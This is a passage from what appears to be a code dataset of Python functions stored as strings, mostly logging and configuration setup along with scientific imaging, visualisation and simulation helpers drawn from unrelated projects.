= int(config['retention'])", "def __setup_logging(self):\n\n loglevel = logging.INFO\n if self.config[\"verbose\"]:\n loglevel = logging.DEBUG\n\n FORMAT = '[%(asctime)s %(filename)s:%(lineno)s %(levelname)s] %(message)s'\n if self.config[\"log\"]:\n logging.basicConfig(format=FORMAT, level=loglevel, filename=self.config[\"log\"])\n else:\n logging.basicConfig(format=FORMAT, level=loglevel)", "def __init__(self, input_xml=None, pointing_file=None, datatype='linear', reffile_defaults='crds',\n reffile_overrides=None, use_JWST_pipeline=True, catalogs=None, cosmic_rays=None,\n background=None, roll_angle=None, dates=None,\n observation_list_file=None, verbose=False, output_dir='./', simdata_output_dir='./',\n dateobs_for_background=False, segmap_flux_limit=None, segmap_flux_limit_units=None,\n add_ghosts=True, convolve_ghosts_with_psf=False, convolve_extended_with_psf=True,\n offline=False):\n # Initialize log\n self.logger = logging.getLogger('mirage.yaml.yaml_generator')\n self.logger.info('Running yaml_generator....\\n')\n self.logger.info('using APT xml file: {}\\n'.format(input_xml))\n self.logger.info('Original log file name: ./{}'.format(STANDARD_LOGFILE_NAME))\n\n parameter_overrides = {'cosmic_rays': cosmic_rays, 'background': background, 'roll_angle': roll_angle,\n 'dates': dates}\n\n self.info = {}\n self.input_xml = input_xml\n self.pointing_file = pointing_file\n self.datatype = datatype\n self.use_JWST_pipeline = use_JWST_pipeline\n self.observation_list_file = observation_list_file\n self.verbose = verbose\n self.output_dir = output_dir\n self.simdata_output_dir = simdata_output_dir\n if reffile_defaults in ['crds', 'crds_full_name']:\n self.reffile_defaults = reffile_defaults\n else:\n raise ValueError(\"reffile_defaults must be 'crds' or 'crds_full_name'\")\n self.reffile_overrides = reffile_overrides\n\n self.catalogs = catalogs\n self.table_file = None\n self.use_nonstsci_names = False\n self.use_linearized_darks = True\n self.psfwfe = 'predicted'\n self.psfwfegroup = 0\n self.resets_bet_ints = 1 # NIRCam should be 1\n self.psf_paths = None\n self.expand_catalog_for_segments = False\n self.dateobs_for_background = dateobs_for_background\n self.add_psf_wings = True\n self.add_ghosts = add_ghosts\n self.convolve_ghosts = convolve_ghosts_with_psf\n self.convolve_extended = convolve_extended_with_psf\n self.offline = offline\n\n if ((segmap_flux_limit is not None) and (segmap_flux_limit_units is None)):\n raise ValueError(\"If segmap_flux_limit is provided, segmap_flux_units must also be provided.\")\n\n if segmap_flux_limit is None:\n self.segmentation_threshold = SEGMENTATION_MIN_SIGNAL_RATE\n else:\n self.segmentation_threshold = segmap_flux_limit\n if segmap_flux_limit_units is None:\n self.segmentation_threshold_units = 'ADU/sec'\n else:\n self.segmentation_threshold_units = segmap_flux_limit_units\n\n # Expand the MIRAGE_DATA environment variable\n self.datadir = expand_environment_variable(ENV_VAR, offline=self.offline)\n\n # Check that CRDS-related environment variables are set correctly\n self.crds_datadir = crds_tools.env_variables()\n\n # Get the path to the 'MIRAGE' package\n self.modpath = pkg_resources.resource_filename('mirage', '')\n\n self.config_information = utils.organize_config_files(offline=self.offline)\n\n self.path_defs()\n\n if (input_xml is not None):\n if self.observation_list_file is None:\n self.observation_list_file = os.path.join(self.output_dir, 'observation_list.yaml')\n self.apt_xml_dict, self.xml_skipped_observations = get_observation_dict(self.input_xml, self.observation_list_file, catalogs,\n verbose=self.verbose,\n parameter_overrides=parameter_overrides)\n else:\n self.logger.error('No input xml file provided. Observation dictionary not constructed.')\n\n self.reffile_setup()", "def setup_logging(log_file_path,timestamp_filename=True,max_log_size=104857600):\n assert( len(log_file_path) > 1 )\n assert( type(log_file_path) == type(\"\") )\n global logger\n\n # Make sure output dir(s) exists\n log_file_folder = os.path.dirname(log_file_path)\n if log_file_folder is not None:\n if not os.path.exists(log_file_folder):\n os.makedirs(log_file_folder)\n\n # Add timetamp for filename if needed\n if timestamp_filename:\n # http://stackoverflow.com/questions/8472413/add-utc-time-to-filename-python\n # '2015-06-30-13.44.15'\n timestamp_string = datetime.datetime.utcnow().strftime(\"%Y-%m-%d %H.%M.%S%Z\")\n # Full log\n log_file_path = add_timestamp_to_log_filename(log_file_path,timestamp_string)\n\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n # 2015-07-21 18:56:23,428 - t.11028 - INFO - ln.156 - Loading page 0 of posts for u'mlpgdraws.tumblr.com'\n formatter = logging.Formatter(\"%(asctime)s - t.%(thread)d - %(levelname)s - ln.%(lineno)d - %(message)s\")\n\n # File 1, log everything\n # https://docs.python.org/2/library/logging.handlers.html\n # Rollover occurs whenever the current log file is nearly maxBytes in length; if either of maxBytes or backupCount is zero, rollover never occurs.\n fh = logging.handlers.RotatingFileHandler(\n filename=log_file_path,\n # https://en.wikipedia.org/wiki/Binary_prefix\n # 104857600 100MiB\n maxBytes=max_log_size,\n backupCount=10,# Ten should be enough to debug but not use too mcuh storage\n )\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n # Console output\n ch = logging.StreamHandler()\n ch.setLevel(config.console_log_level)\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n logging.info(\"Logging started.\")\n return logger", "def setup_logging(log_file_path,timestamp_filename=True,max_log_size=104857600):\n assert( len(log_file_path) > 1 )\n assert( type(log_file_path) == type(\"\") )\n global logger\n\n # Make sure output dir(s) exists\n log_file_folder = os.path.dirname(log_file_path)\n if log_file_folder is not None:\n if not os.path.exists(log_file_folder):\n os.makedirs(log_file_folder)\n\n # Add timetamp for filename if needed\n if timestamp_filename:\n # http://stackoverflow.com/questions/8472413/add-utc-time-to-filename-python\n # '2015-06-30-13.44.15'\n timestamp_string = datetime.datetime.utcnow().strftime(\"%Y-%m-%d %H.%M.%S%Z\")\n # Full log\n log_file_path = add_timestamp_to_log_filename(log_file_path,timestamp_string)\n\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n # 2015-07-21 18:56:23,428 - t.11028 - INFO - ln.156 - Loading page 0 of posts for u'mlpgdraws.tumblr.com'\n formatter = logging.Formatter(\"%(asctime)s - t.%(thread)d - %(levelname)s - ln.%(lineno)d - %(message)s\")\n\n # File 1, log everything\n # https://docs.python.org/2/library/logging.handlers.html\n # Rollover occurs whenever the current log file is nearly maxBytes in length; if either of maxBytes or backupCount is zero, rollover never occurs.\n fh = logging.handlers.RotatingFileHandler(\n filename=log_file_path,\n # https://en.wikipedia.org/wiki/Binary_prefix\n # 104857600 100MiB\n maxBytes=max_log_size,\n backupCount=10000,# Ten thousand should be enough to crash before we reach it.\n )\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n # Console output\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n logging.info(\"Logging started.\")\n return logger", "def analyse_screening_setup(self):\n\n control = self.control\n logger: LoggerProperties\n\n # Perform some input checks\n # Check project path exists\n if control.project_path == \"\":\n msg = \"Cannot process: Project location not set.\"\n raise LoggerWarning(msg)\n\n # Check at least one logger exists\n if not control.loggers:\n msg = \"Cannot process: No loggers exist in setup.\"\n raise LoggerWarning(msg)\n\n # Check all ids are unique\n control.check_logger_ids()\n\n # Check logging durations and sample lengths are positive\n enabled_loggers = (logger for logger in control.loggers if logger.enabled)\n for logger in enabled_loggers:\n if logger.duration <= 0:\n msg = f\"Cannot process: Logging duration for logger {logger.logger_id} is {logger.duration}.\\n\"\n f\"Logging duration must be greater than zero.\"\n raise LoggerWarning(msg)\n\n # TODO: Move to logger properties as a setup function\n if control.global_process_stats is True and logger.process_stats is True:\n if logger.stats_interval <= 0:\n msg = f\"Cannot process: Statistics sample length for logger \"\n f\"{logger.logger_id} is {logger.stats_interval}.\\n\"\n f\"Statistics sample length must be greater than zero.\"\n raise LoggerWarning(msg)\n\n if control.global_process_spect is True and logger.process_spect is True:\n if logger.spect_interval <= 0:\n msg = f\"Cannot process: Spectral sample length for logger \"\n f\"{logger.logger_id} is {logger.spect_interval}.\\n\"\n f\"Spectral sample length must be greater than zero.\"\n raise LoggerWarning(msg)\n\n # Paths to output folders\n control.set_output_paths()\n\n # Get raw filenames, check timestamps and select files in processing datetime range\n enabled_loggers = (logger for logger in control.loggers if logger.enabled)\n for logger in enabled_loggers:\n # Store logger filenames and check file timestamps\n self.statusbar.showMessage(\n f\"Checking setup: Checking file names for {logger.logger_id}. Please wait...\"\n )\n self.repaint()\n logger.get_filenames()\n\n # Select files to process and, if applicable, check file timestamps are valid\n logger.set_files_to_process()\n\n # Store expected file length\n logger.expected_data_points = logger.freq * logger.duration\n\n # Get all channel names and units if not already stored in logger object\n if len(logger.all_channel_names) == 0 and len(logger.all_channel_units) == 0:\n logger.get_all_columns()\n\n # Update column list in config dashboard if this logger is the one selected\n if logger.logger_id == self.inputDataModule.loggerList.currentItem().text():\n self.inputDataModule.set_logger_columns_list(logger)\n\n # Check requested channels exist\n # Connect warning signal to warning message box in DataLab class\n try:\n # Disconnect any existing connection to prevent repeated triggerings\n logger.logger_warning_signal.disconnect()\n except TypeError:\n pass\n logger.logger_warning_signal.connect(self.warning)\n\n # Set processed channel names and units as user values, if supplied, or file header values\n logger.set_selected_column_and_units_names()\n\n # Check for any columns without any units set and see if the units is embedded in the channel name;\n # if so extract units from channel name and add to units list\n logger.check_if_units_in_channel_name()\n\n # Check number of headers match number of columns to process\n # TODO: This should already have been enforced earlier so perhaps no longer required?\n logger.check_headers()", "def __init__(self, *args, **kwargs):\r\n super().__init__()\r\n self._cfg = ConfigDict() # current configuration\r\n self._default_config = ConfigDict() # default configuration\r\n self._temp_config = OrderedDict() # temporary configuration\r\n self._path = Path() # current configuration path\r\n self._default_path = Path() # default configuration path\r\n self._conversion_dict = None\r\n self._auto_cast = None\r\n self._write_flags = None\r\n self._force_load = None\r\n self._load_empty = None\r\n self._ask_path = None\r\n self._search_in_default_config = None\r\n self._init_count = 0\r\n self._policies = defaultdict(bool) # by default every modification is forbidden # WIP\r\n if args or kwargs:\r\n self.init(*args, **kwargs)\r\n logger.debug(\"Config object created.\")", "def createPostageStamp(imageArray, objectStartArr, velArr,\n timeArr, stamp_width):\n\n singleImagesArray = []\n stampWidth = np.array(stamp_width, dtype=int)\n #print stampWidth\n stampImage = np.zeros(stampWidth)\n \n #if len(np.shape(imageArray)) < 3:\n # imageArray = [imageArray]\n \n measureCoords = calcCenters(np.array(objectStartArr), np.array(velArr), timeArr)\n \n if len(np.shape(measureCoords)) < 2:\n measureCoords = [measureCoords]\n off_edge = []\n for centerCoords in measureCoords:\n if (centerCoords[0] + stampWidth[0]/2 + 1) > np.shape(imageArray[0].science())[1]:\n #raise ValueError('The boundaries of your postage stamp for one of the images go off the edge')\n off_edge.append(True)\n elif (centerCoords[0] - stampWidth[0]/2) < 0:\n #raise ValueError('The boundaries of your postage stamp for one of the images go off the edge')\n off_edge.append(True)\n elif (centerCoords[1] + stampWidth[1]/2 + 1) > np.shape(imageArray[0].science())[0]:\n #raise ValueError('The boundaries of your postage stamp for one of the images go off the edge')\n off_edge.append(True)\n elif (centerCoords[1] - stampWidth[1]/2) < 0:\n #raise ValueError('The boundaries of your postage stamp for one of the images go off the edge')\n off_edge.append(True)\n else:\n off_edge.append(False)\n \n i=0\n for image in imageArray:\n if off_edge[i] is False:\n xmin = int(np.rint(measureCoords[i,1]-stampWidth[0]/2))\n xmax = int(xmin + stampWidth[0])\n ymin = int(np.rint(measureCoords[i,0]-stampWidth[1]/2))\n ymax = int(ymin + stampWidth[1])\n #print xmin, xmax, ymin, ymax\n single_stamp = image.science()[xmin:xmax, ymin:ymax]\n single_stamp[np.isnan(single_stamp)] = 0.\n single_stamp[np.isinf(single_stamp)] = 0.\n stampImage += single_stamp\n singleImagesArray.append(single_stamp)\n else:\n single_stamp = np.zeros((stampWidth))\n singleImagesArray.append(single_stamp)\n \n i+=1\n return stampImage, singleImagesArray", "def __init__(self, dat, frame, box_size, centre,\n arrow_width=_arrow_width,\n arrow_head_width=_arrow_head_width,\n arrow_head_length=_arrow_head_length,\n pad=_colormap_label_pad,\n label=False, **kwargs):\n\n super().__init__(dat, frame, box_size, centre,\n arrow_width=arrow_width,\n arrow_head_width=arrow_head_width,\n arrow_head_length=arrow_head_length) # initialise superclass\n\n self.velocities = dat.getVelocities(frame, *self.particles) # particles' displacements at frame\n\n self.vmin, self.vmax = amplogwidth(self.velocities)\n try:\n self.vmin = np.log10(kwargs['vmin'])\n except (KeyError, AttributeError): pass # 'vmin' not in keyword arguments or None\n try:\n self.vmax = np.log10(kwargs['vmax'])\n except (KeyError, AttributeError): pass # 'vmax' not in keyword arguments or None\n\n self.colorbar(self.vmin, self.vmax) # add colorbar to figure\n self.colormap.set_label( # colorbar legend\n r'$\\log_{10}||\\vec{v}_i(t)||$',\n labelpad=pad, rotation=270)\n\n self.label = label # write labels\n\n self.draw()", "def __init__(self, checkpoint_dir: str, **kwargs):\n assert type(checkpoint_dir) is str\n self.checkpoint_dir, self.parameter, self.is_trained = self.version(checkpoint_dir, parameter=kwargs)\n logging.info('checkpoint: {}'.format(self.checkpoint_dir))\n for k, v in self.parameter.items():\n logging.info(' - [arg] {}: {}'.format(k, str(v)))\n self.__dict__.update(self.parameter)", "def __init__(self,\n top_k=None, # type: Optional[int]\n conf_threshold=None, # type: Optional[thelper.typedefs.Number]\n iou_threshold=None, # type: Optional[thelper.typedefs.Number]\n class_names=None, # type: Optional[List[AnyStr]]\n target_name=None, # type: Optional[AnyStr]\n viz_count=0, # type: int\n report_count=None, # type: Optional[int]\n log_keys=None, # type: Optional[List[AnyStr]]\n format=None, # type: Optional[AnyStr]\n ): # type: (...) -> None\n assert top_k is None or isinstance(top_k, int) and top_k > 0, \"invalid top-k value\"\n assert conf_threshold is None or (isinstance(conf_threshold, (float, int)) and 0 <= conf_threshold <= 1), \\\n \"detection confidence threshold should be 'None' or number in [0, 1]\"\n assert iou_threshold is None or (isinstance(iou_threshold, (int, float)) and 0 <= iou_threshold <= 1), \\\n \"detection IoU threshold should be 'None' or number in [0, 1]\"\n assert isinstance(viz_count, int) and viz_count >= 0, \"invalid image count to visualize\"\n assert report_count is None or (\n isinstance(report_count, int) and report_count >= 0), \"invalid report sample count\"\n assert log_keys is None or isinstance(log_keys, list), \"invalid list of sample keys to log\"\n self.top_k = top_k\n self.target_name = target_name\n self.target_idx = None\n self.conf_threshold = conf_threshold\n self.iou_threshold = iou_threshold\n self.viz_count = viz_count\n self.report_count = report_count\n self.log_keys = log_keys if log_keys is not None else []\n self.bbox = None # type: Optional[thelper.typedefs.DetectionPredictionType]\n self.true = None # type: Optional[thelper.typedefs.DetectionTargetType]\n self.meta = None # type: Optional[Dict[AnyStr, List[Any]]]\n ClassNamesHandler.__init__(self, class_names)\n FormatHandler.__init__(self, format)", "def __init__(\n self,\n robot_state=None,\n robot_timestamp=None,\n measure_timestamp=None,\n point_cloud=None):\n\n self.robot_state = robot_state\n self.robot_timestamp = robot_timestamp\n self.point_cloud = point_cloud\n self.measure_timestamp = measure_timestamp", "def __init__(self, config):\n super().__init__(config)\n\n # Prepare the timer.\n self.timer = 0\n\n # Set the current player index.\n self.current_player_index = 0\n # If we are the client, the server goes first.\n for i in range(len(sys.argv)):\n if sys.argv[i] == \"--client\":\n self.current_player_index = 1\n\n # Prepare the phase counter.\n self.__current_phase = Game.PHASE_PREPARE\n # Prepare the shot location store.\n self.__current_fire_location = None\n self.__current_fire_effect = None", "def __init__(self, beaver_config, file_config, logger=None):\n self._current_host = beaver_config.get('hostname')\n self._file_config = file_config\n\n if beaver_config.get('format') == 'msgpack':\n import msgpack\n packer = msgpack.Packer()\n self._formatter = packer.pack\n elif beaver_config.get('format') == 'json':\n # priority: ujson > simplejson > jsonlib2 > json\n priority = ['ujson', 'simplejson', 'jsonlib2', 'json']\n for mod in priority:\n try:\n json = __import__(mod)\n self._formatter = json.dumps\n except ImportError:\n pass\n else:\n break\n elif beaver_config.get('format') == 'string':\n def string_formatter(self, data):\n return \"[{0}] [{1}] {2}\".format(data['@source_host'], data['@timestamp'], data['@message'])\n self._formatter = string_formatter\n else:\n def null_formatter(self, data):\n return data['@message']\n self._formatter = null_formatter", "def __init__(self):\n super(GithubCollector, self).__init__()\n config_file = ('collectors.cfg')\n log_file = self.config['Github']['log_file']\n logging.config.fileConfig(config_file,\n defaults={'GithubCollector': log_file}\n )\n self.logger = logging.getLogger('GithubCollector')\n self.elasticsearch = Elasticsearch(['localhost:9200'])\n self.redis = redis.Redis(host='127.0.0.1', port=6379, password='')\n self.timestamp = datetime.date.today().isoformat()", "def __init__(self, **kwargs):\n self.postKey = kwargs.get(\"postKey\")\n self.location = kwargs.get(\"location\")\n self.category = kwargs.get(\"category\")\n self.source = kwargs.get(\"source\")\n self.heading = kwargs.get(\"heading\")\n self.body = kwargs.get(\"body\")\n self.latitude = kwargs.get(\"latitude\")\n self.longitude = kwargs.get(\"longitude\")\n self.language = kwargs.get(\"language\")\n self.price = kwargs.get(\"price\")\n self.currency = kwargs.get(\"currency\")\n self.images = kwargs.get(\"images\", [])\n self.externalID = kwargs.get(\"externalID\")\n self.externalURL = kwargs.get(\"externalURL\")\n self.accountName = kwargs.get(\"accountName\")\n self.accountID = kwargs.get(\"accountID\")\n self.timestamp = kwargs.get(\"timestamp\")\n self.expiration = kwargs.get(\"expiration\")\n self.annotations = kwargs.get(\"annotations\", {})\n self.trustedAnnotations = kwargs.get(\"trustedAnnotations\", {})\n self.clickCount = kwargs.get(\"clickCount\")", "def config(\n data_folder=settings.data_folder,\n logs_folder=settings.logs_folder,\n imgs_folder=settings.imgs_folder,\n cache_folder=settings.cache_folder,\n cache_responses=settings.cache_responses,\n log_file=settings.log_file,\n log_console=settings.log_console,\n log_level=settings.log_level,\n log_name=settings.log_name,\n log_filename=settings.log_filename,\n useful_idf_objects=settings.useful_idf_objects,\n default_weight_factor=\"area\",\n ep_version=settings.ep_version,\n debug=settings.debug,\n):\n # set each global variable to the passed-in parameter value\n settings.cache_responses = cache_responses\n settings.cache_folder = Path(cache_folder).expand().makedirs_p()\n settings.data_folder = Path(data_folder).expand().makedirs_p()\n settings.imgs_folder = Path(imgs_folder).expand().makedirs_p()\n settings.logs_folder = Path(logs_folder).expand().makedirs_p()\n settings.log_console = log_console\n settings.log_file = log_file\n settings.log_level = log_level\n settings.log_name = log_name\n settings.log_filename = log_filename\n settings.useful_idf_objects = useful_idf_objects\n settings.zone_weight.set_weigth_attr(default_weight_factor)\n settings.ep_version = ep_version\n settings.debug = debug\n\n # if logging is turned on, log that we are configured\n if settings.log_file or settings.log_console:\n get_logger(name=\"archetypal\")\n log(\"Configured archetypal\")", "def log_setup():\n logger = logging.getLogger('diskover')\n logger_warn = logging.getLogger('diskover_warn')\n eslogger = logging.getLogger('elasticsearch')\n diskover_eslogger = logging.getLogger('diskover_elasticsearch')\n loglevel = config['logLevel'].get()\n if options.debug:\n loglevel = 'DEBUG'\n if loglevel == 'DEBUG':\n loglevel = logging.DEBUG\n elif loglevel == 'INFO':\n loglevel = logging.INFO\n else:\n loglevel = logging.WARN\n logformat = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n if logtofile:\n # create log file name using top dir names and datestamp\n treedirsstr = ''\n if args:\n n = 1\n dirs = args[0:]\n x = len(dirs)\n for d in dirs:\n if d != '/':\n d = d.rstrip('/')\n treedirsstr += os.path.basename(d)\n if n < x:\n treedirsstr += '_'\n n += 1\n else:\n treedirsstr = os.path.basename(os.getcwd())\n logfiletime = datetime.now().isoformat()\n logname = 'diskover_' + treedirsstr + '_' + logfiletime + '.log'\n logfile = os.path.join(logdir, logname)\n handler_file = logging.FileHandler(logfile)\n handler_file.setFormatter(logging.Formatter(logformat))\n logger.setLevel(loglevel)\n logger.addHandler(handler_file)\n # console logging\n handler_con = logging.StreamHandler()\n handler_con.setFormatter(logging.Formatter(logformat))\n logger.addHandler(handler_con)\n # warnings log\n logname_warn = 'diskover_' + treedirsstr + '_' + logfiletime + '_warnings.log'\n logfile_warn = os.path.join(logdir, logname_warn)\n handler_warnfile = logging.FileHandler(logfile_warn)\n handler_warnfile.setFormatter(logging.Formatter(logformat))\n logger_warn.setLevel(logging.WARN)\n logger_warn.addHandler(handler_warnfile)\n # es logger\n eslogger.setLevel(logging.WARN)\n eslogger.addHandler(handler_file)\n eslogger.addHandler(handler_con)\n # diskover es logger\n diskover_eslogger.setLevel(loglevel)\n diskover_eslogger.addHandler(handler_file)\n diskover_eslogger.addHandler(handler_con)\n else:\n handler_file = None\n handler_warnfile = None\n handler_con = None\n logging.basicConfig(format=logformat, level=loglevel)\n eslogger.setLevel(logging.WARN)\n return logger, logger_warn, loglevel, logformat, \\\n handler_file, handler_warnfile, handler_con", "def __init__(self, xyz_coord, radius, brightness):\n verify_xyz_coord_type(xyz_coord)\n verify_radius_value(radius)\n verify_brightness_value(brightness)\n\n self.xyz_coord = list(xyz_coord)\n self.radius = radius\n self.brightness = brightness\n\n self.pulse_data = {XYZ_COORD_LABEL: self.xyz_coord,\n RADIUS_LABEL: self.radius,\n BRIGHTNESS_LABEL: self.brightness}", "def __init__(self):\n\n super().__init__()\n\n self.active = True\n self.driver = Driver.instance()\n self.camera = Camera.instance()\n\n # define directories and file paths\n date_str = datetime.today().strftime(\"%Y-%m-%d-%H-%M-%S\")\n self.log_dir = f\"{const.Storage.DATA}/{date_str}\"\n self.img_dir = f\"{self.log_dir}/img/\"\n self.log_path = f\"{self.log_dir}/log.csv\"\n self.img_extension = \"npy\"\n\n # ensure that the necessary directories exist\n os.mkdir(self.log_dir)\n os.mkdir(self.img_dir)\n assert os.path.isdir(self.log_dir), \"data directory could not be created\"\n assert os.path.isdir(self.img_dir), \"image directory could not be created\"", "def __init__(self, config, logger=None, verbose=2):\n self.logger = logger\n self.config = config\n self.verbose = verbose\n self.log_command_to_met_log = False", "def __init__(self, savePath, configSlice=slice(None, None, None)):\n super().__init__(savePath, configSlice)\n ## `dict` of log weights (`str` -> `list`)\n self.logWeights = {}", "def __init__(self, camID, camera_cal_file='camera_cal_bnl.yaml'):\n self.camID=camID\n with open(camera_cal_file,\"r\") as yfile:\n params=yaml.load(yfile)\n # exit gracefully if yfile doesn't open\n self.nx0=params[camID]['nx0']\n self.ny0=self.nx0\n # pr0 is nx0/2, i.e. probably initial radius estimate.\n # pr0 rather than nx0 should be in the camera_cal_SSS.yaml config file\n self.pr0=(self.nx0+self.ny0)/4.\n self.ndy0=params[camID]['ndy0']\n self.ndx0=params[camID]['ndx0']\n self.cx=params[camID]['cx']\n self.cy=params[camID]['cy']\n self.rot=params[camID]['rot']\n self.beta=params[camID]['beta']\n self.azm=params[camID]['azm']\n self.c1=params[camID]['c1']\n self.c2=params[camID]['c2']\n self.c3=params[camID]['c3']\n self.lat=params[camID]['lat']\n self.lon=params[camID]['lon']\n# may need to resurrect this\n# xstart=int(params[camID]['cy']-nx0/2+0.5); ystart=int(params[camID]['cx']-ny0/2+0.5)\n self.nx0=int(self.nx0+0.5)\n self.ny0=int(self.ny0+0.5)", "def configure(self):\n self.data_batch_file = self.get_value_from_config('data_batch_file')\n self.batch_meta_file = self.get_value_from_config('batch_meta_file')\n self.has_background = self.get_value_from_config('has_background')\n self.num_classes = self.get_value_from_config('num_classes')\n self.converted_images_dir = self.get_value_from_config('converted_images_dir')\n if not self.converted_images_dir:\n self.converted_images_dir = self.data_batch_file.parent / 'converted_images'\n self.convert_images = self.get_value_from_config('convert_images')\n # create directory for storing images if it is necessary\n if self.convert_images and not self.converted_images_dir.exists():\n self.converted_images_dir.mkdir(parents=True)\n self.dataset_meta = self.get_value_from_config('dataset_meta_file')", "def create_annotation_data(self):\n for i, hp in enumerate(self.hanging_point_in_camera_coords_list):\n px, py = self.camera_model.project3d_to_pixel(hp.worldpos())\n if self.save_debug_image:\n self.bgr_axis = self.bgr.copy()\n if 0 <= px < self.target_width and 0 <= py < self.target_height:\n if self.save_debug_image:\n draw_axis(self.bgr_axis,\n hp.worldrot(),\n hp.worldpos(),\n self.camera_model.K)\n create_gradient_circle(\n self.annotation_img,\n int(py), int(px))\n if self.visible_labels == []:\n self.annotation_data.append(\n {'xy': [int(px), int(py)],\n 'depth': hp.worldpos()[2] * 1000,\n 'quaternion': hp.quaternion.tolist()}\n )\n else:\n self.annotation_data.append(\n {'xy': [int(px), int(py)],\n 'depth': hp.worldpos()[2] * 1000,\n 'quaternion': hp.quaternion.tolist(),\n 'label': self.visible_labels[i]}\n )\n self.rotation_map.add_quaternion(\n int(px), int(py), hp.quaternion)\n\n # self.depth_map.add_depth(\n # int(px), int(py),\n # hp.worldpos()[2] * 1000)\n\n if np.all(self.annotation_img == 0):\n print('out of camera')\n return False\n\n self.annotation_img \\\n = self.annotation_img / self.annotation_img.max() * 255\n self.annotation_img = self.annotation_img.astype(np.uint8)\n\n self.rotations = self.rotation_map.rotations\n\n # self.hanging_points_depth = self.depth_map.on_depth_image(self.depth)\n\n return True", "def pre_process_information(self):\n self.logger.debug(\n colorama.Fore.BLUE\n + \"jsnapy.cfg file location used : %s\" % get_config_location(),\n extra=self.log_detail,\n )\n self.logger.debug(\n colorama.Fore.BLUE\n + \"Configuration file location used : %s\"\n % get_path(\"DEFAULT\", \"config_file_path\"),\n extra=self.log_detail,\n )", "def __init__(self, log_path):\n # create a map for storing LogImg objects\n self.log_img_map = OrderedDict()\n\n # set the path to the log directory\n self.log_path = log_path\n\n # check if log directory already exists or create it\n if not os.path.exists(self.log_path):\n os.makedirs(self.log_path)\n\n # set current training step\n self.train_step = 0", "def __init__(self, dat, frame, box_size, centre,\n arrow_width=_arrow_width,\n arrow_head_width=_arrow_head_width,\n arrow_head_length=_arrow_head_length,\n pad=_colormap_label_pad, dt=1,jump=1,\n label=False, **kwargs):\n\n super().__init__(dat, frame, box_size, centre,\n arrow_width=arrow_width,\n arrow_head_width=arrow_head_width,\n arrow_head_length=arrow_head_length) # initialise superclass\n\n self.displacements = (\n dat.getDisplacements(frame, frame + dt, *self.particles, jump=jump)) # particles' displacements at frame\n\n self.vmin, self.vmax = amplogwidth(self.displacements)\n try:\n self.vmin = np.log10(kwargs['vmin'])\n except (KeyError, AttributeError): pass # 'vmin' not in keyword arguments or None\n try:\n self.vmax = np.log10(kwargs['vmax'])\n except (KeyError, AttributeError): pass # 'vmax' not in keyword arguments or None\n\n self.colorbar(self.vmin, self.vmax) # add colorbar to figure\n self.colormap.set_label( # colorbar legend\n r'$\\log_{10}||\\vec{r}_i(t + \\Delta t) - \\vec{r}_i(t)||$',\n labelpad=pad, rotation=270)\n\n self.label = label # write labels\n\n self.draw()", "def log_builder(self, log_level, hrtimestamp, datestamp, timestamp, log_msg, tags):\n log_body = {}\n log_body[\"filename\"] = self.filename\n log_body[\"log_level\"] = log_level\n log_body[\"hrtimestamp\"] = hrtimestamp\n log_body[\"datestamp\"] = datestamp\n log_body[\"timestamp\"] = timestamp\n log_body[\"log_msg\"] = log_msg\n log_body[\"tags\"] = tags\n return log_body", "def __init__(self, key=None, log_dir=None, log_thresh=1):\n self.key = key\n self.log_dir = log_dir\n self.log_thresh = log_thresh\n self.last_h = None\n self.last_a = None\n self.last_x0 = None\n self.last_y0 = None\n self.last_sx = None\n self.last_sy = None\n self.last_theta = None\n self.last_cutoff = None\n\n if self.log_dir:\n if not os.path.isdir(self.log_dir):\n raise ValueError(self.log_dir + \" is not a directory\")", "def __init__(self, **kwargs):\n super(MBTilesBuilder, self).__init__(**kwargs)\n self.filepath = kwargs.get('filepath', DEFAULT_FILEPATH)\n # Gather tiles for mbutil\n basename, ext = os.path.splitext(os.path.basename(self.filepath))\n self.tmp_dir = kwargs.get('tmp_dir', DEFAULT_TMP_DIR)\n self.tmp_dir = os.path.join(self.tmp_dir, basename)\n # Number of tiles in total\n self.nbtiles = 0\n self._bboxes = []", "def __init__(\n self, im_width=512,\n im_height=424, fov=42.5,\n near_plane=0.1, far_plane=30.0,\n target_width=256, target_height=256,\n use_change_light=True, labels=None,\n save_dir='./', save_debug_image=False,\n gui=False, task_type='hanging', stop_per_data=False,\n random_texture_path=None):\n self.objects = []\n self.im_width = im_width\n self.im_height = im_height\n self.fov = fov\n self.near_plane = near_plane\n self.far_plane = far_plane\n self.target_width = target_width\n self.target_height = target_height\n self.save_dir = save_dir\n self.save_debug_image = save_debug_image\n self.task_type = task_type\n self.stop_per_data = stop_per_data\n\n if self.task_type == 'hanging':\n # direction of grabity\n self.translate_value = np.array([0, 0.005, 0])\n elif self.task_type == 'pouring':\n # direction opposite to gravity\n self.translate_value = np.array([-0.005, 0, 0])\n\n aspect = self.im_width / self.im_height\n self.camera_model \\\n = cameramodels.PinholeCameraModel.from_fov(\n fov, im_height, im_width)\n\n self.camera_model.target_size = (target_width, target_height)\n self.pm = pybullet.computeProjectionMatrixFOV(\n fov, aspect, near_plane, far_plane)\n\n self.camera_coords = coordinates.Coordinates(\n pos=np.array([0, 0, 0.5]),\n rot=coordinates.math.rotation_matrix_from_rpy([0, np.pi, 0]))\n\n self.annotation_img = np.zeros(\n (target_width, target_height), dtype=np.uint32)\n\n self.annotation_data = []\n self.rotation_map = RotationMap(target_width, target_height)\n self.rotations = None\n self.depth_map = DepthMap(target_width, target_height, circular=True)\n\n self.object_coords = coordinates.Coordinates(\n pos=np.array([0, 0, 0.1]),\n rot=coordinates.math.rotation_matrix_from_rpy([0, 0, 0]))\n\n self.labels = labels\n self.visible_labels = []\n\n if gui:\n self.cid = pybullet.connect(pybullet.GUI)\n pybullet.resetDebugVisualizerCamera(\n cameraDistance=1,\n cameraYaw=90,\n cameraPitch=0,\n cameraTargetPosition=[0, 0, 0.1])\n else:\n self.cid = pybullet.connect(pybullet.DIRECT)\n self.gui = gui\n self.no_visible_count = 0\n self.no_visible_skip_num = 300\n\n self.texture_paths = list(\n map(str, 